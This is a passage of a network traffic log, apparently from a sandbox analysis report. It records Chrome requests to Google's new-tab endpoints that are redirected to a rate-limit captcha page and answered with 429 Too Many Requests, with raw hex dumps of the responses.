2024-04-26 15:11:32 UTC	97	IN	Data Raw: 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a Data Ascii: 362]],"google:suggesttype":["QUERY","QUERY","QUERY","ENTITY","QUERY","QUERY","QUERY","QUERY"]}]
2024-04-26 15:11:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49727	192.178.50.36	443	6252	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:11:31 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 15:11:32 UTC	1816	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgRmgZjcGKSIr7EGIjBaPiH7ydCcW1t0uddwg3g_WoymxNw6oYn7W7bYk_Rw_jH0vMQpLuaIzJERlSBC-bgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIpIivsQYQzvW7sAESBGaBmNw Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Fri, 26 Apr 2024 15:11:32 GMT Server: gws Content-Length: 427 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-26-15; expires=Sun, 26-May-2024 15:11:32 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=ilpMolbSmWWnfocYStlsoD43TIKelvk7eazl4EZxvE2SkEimHhQd01qwtpGHEYeVVHYNiEWEs8Dw9WNz5JNG_9L0qgDl6Sicr6x_DUdDuX1fCycKNNji0QeAP6GQGZ0M8HNA4z6Q0LFaT9DNlJFR-yBVS3TfOsDOIITsklKYPls; expires=Sat, 26-Oct-2024 15:11:32 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 15:11:32 UTC	427	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 25 33 46 61 73 79 6e Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49729	192.178.50.36	443	6252	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:11:31 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 15:11:32 UTC	1843	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGKSIr7EGIjD_gy0lEzxGmT4ruUn43olxNd26dv_6t9V1kHHuQNrJ-I6ufJvD3u2tO-YexKH-zpoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIpIivsQYQv8nS1gESBGaBmNw Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Fri, 26 Apr 2024 15:11:32 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-26-15; expires=Sun, 26-May-2024 15:11:32 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=V9bQiwKLLaVTR4cAvt6Unn9yyEPgJNnLYApBfw8mztlAxzw79yKA920gx3GB7O7pdZ0GuWLMCJE7fpE5FrZ5GTM3deJ5P349iVtScHU03G3_vdNrR463Ms1ZdRnOrRaJtVJpq1Fna2nok34GAZezDhbaJotqmLQzTbkOJkFuPM8; expires=Sat, 26-Oct-2024 15:11:32 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 15:11:32 UTC	458	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49728	192.178.50.36	443	6252	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:11:31 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 15:11:32 UTC	1761	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGKSIr7EGIjBNN4QNigwzXQnWujQoDXOdTWRctX9-iQ2o60jrfBaHO86I3LesLUSwtQRWNww27-YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIpIivsQYQj-iUiwISBGaBmNw Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Fri, 26 Apr 2024 15:11:32 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-26-15; expires=Sun, 26-May-2024 15:11:32 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=mBpMdDuQUM098tgF-RftvJu-NPK7YfkE1CPzJF3NXnIlIFlqe9p8_ks2w5ygwrjY1WWUtQ0sj4xfJdVG3EL4CrGCzMBS9zlp7BKlEtOgW2LY1r1aYd6PiBvNiGDdaJI1Yyc2ErHauJmI6J0-6N6lH-tLw47o3FA5_-6KNrSKYXU; expires=Sat, 26-Oct-2024 15:11:32 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 15:11:32 UTC	417	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49735	192.178.50.36	443	6252	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:11:32 UTC	742	OUT	GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgRmgZjcGKSIr7EGIjBaPiH7ydCcW1t0uddwg3g_WoymxNw6oYn7W7bYk_Rw_jH0vMQpLuaIzJERlSBC-bgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-26-15; NID=513=ilpMolbSmWWnfocYStlsoD43TIKelvk7eazl4EZxvE2SkEimHhQd01qwtpGHEYeVVHYNiEWEs8Dw9WNz5JNG_9L0qgDl6Sicr6x_DUdDuX1fCycKNNji0QeAP6GQGZ0M8HNA4z6Q0LFaT9DNlJFR-yBVS3TfOsDOIITsklKYPls
2024-04-26 15:11:33 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 26 Apr 2024 15:11:33 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3132 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 15:11:33 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 3f 61 73 79 6e 63 3d 6e 74 70 3a 32 3c 2f 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/ddljson?async=ntp:2</title>
2024-04-26 15:11:33 UTC	1255	IN	Data Raw: 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 31 67 61 35 5a 36 74 57 7a 5a 50 4f 2d 36 65 64 5a 35 45 76 55 53 36 6c 64 53 6e Data Ascii: tCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="1ga5Z6tWzZPO-6edZ5EvUS6ldSn
2024-04-26 15:11:33 UTC	978	IN	Data Raw: 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e Data Ascii: ears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the mean

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49736	192.178.50.36	443	6252	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:11:33 UTC	920	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGKSIr7EGIjD_gy0lEzxGmT4ruUn43olxNd26dv_6t9V1kHHuQNrJ-I6ufJvD3u2tO-YexKH-zpoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-26-15; NID=513=V9bQiwKLLaVTR4cAvt6Unn9yyEPgJNnLYApBfw8mztlAxzw79yKA920gx3GB7O7pdZ0GuWLMCJE7fpE5FrZ5GTM3deJ5P349iVtScHU03G3_vdNrR463Ms1ZdRnOrRaJtVJpq1Fna2nok34GAZezDhbaJotqmLQzTbkOJkFuPM8
2024-04-26 15:11:33 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 26 Apr 2024 15:11:33 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3186 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 15:11:33 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-04-26 15:11:33 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 4b 67 71 5f 61 2d 56 77 68 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="Kgq_a-Vwh
2024-04-26 15:11:33 UTC	1032	IN	Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49738	192.178.50.36	443	6252	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:11:33 UTC	738	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGKSIr7EGIjBNN4QNigwzXQnWujQoDXOdTWRctX9-iQ2o60jrfBaHO86I3LesLUSwtQRWNww27-YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-26-15; NID=513=mBpMdDuQUM098tgF-RftvJu-NPK7YfkE1CPzJF3NXnIlIFlqe9p8_ks2w5ygwrjY1WWUtQ0sj4xfJdVG3EL4CrGCzMBS9zlp7BKlEtOgW2LY1r1aYd6PiBvNiGDdaJI1Yyc2ErHauJmI6J0-6N6lH-tLw47o3FA5_-6KNrSKYXU
2024-04-26 15:11:33 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 26 Apr 2024 15:11:33 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3114 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
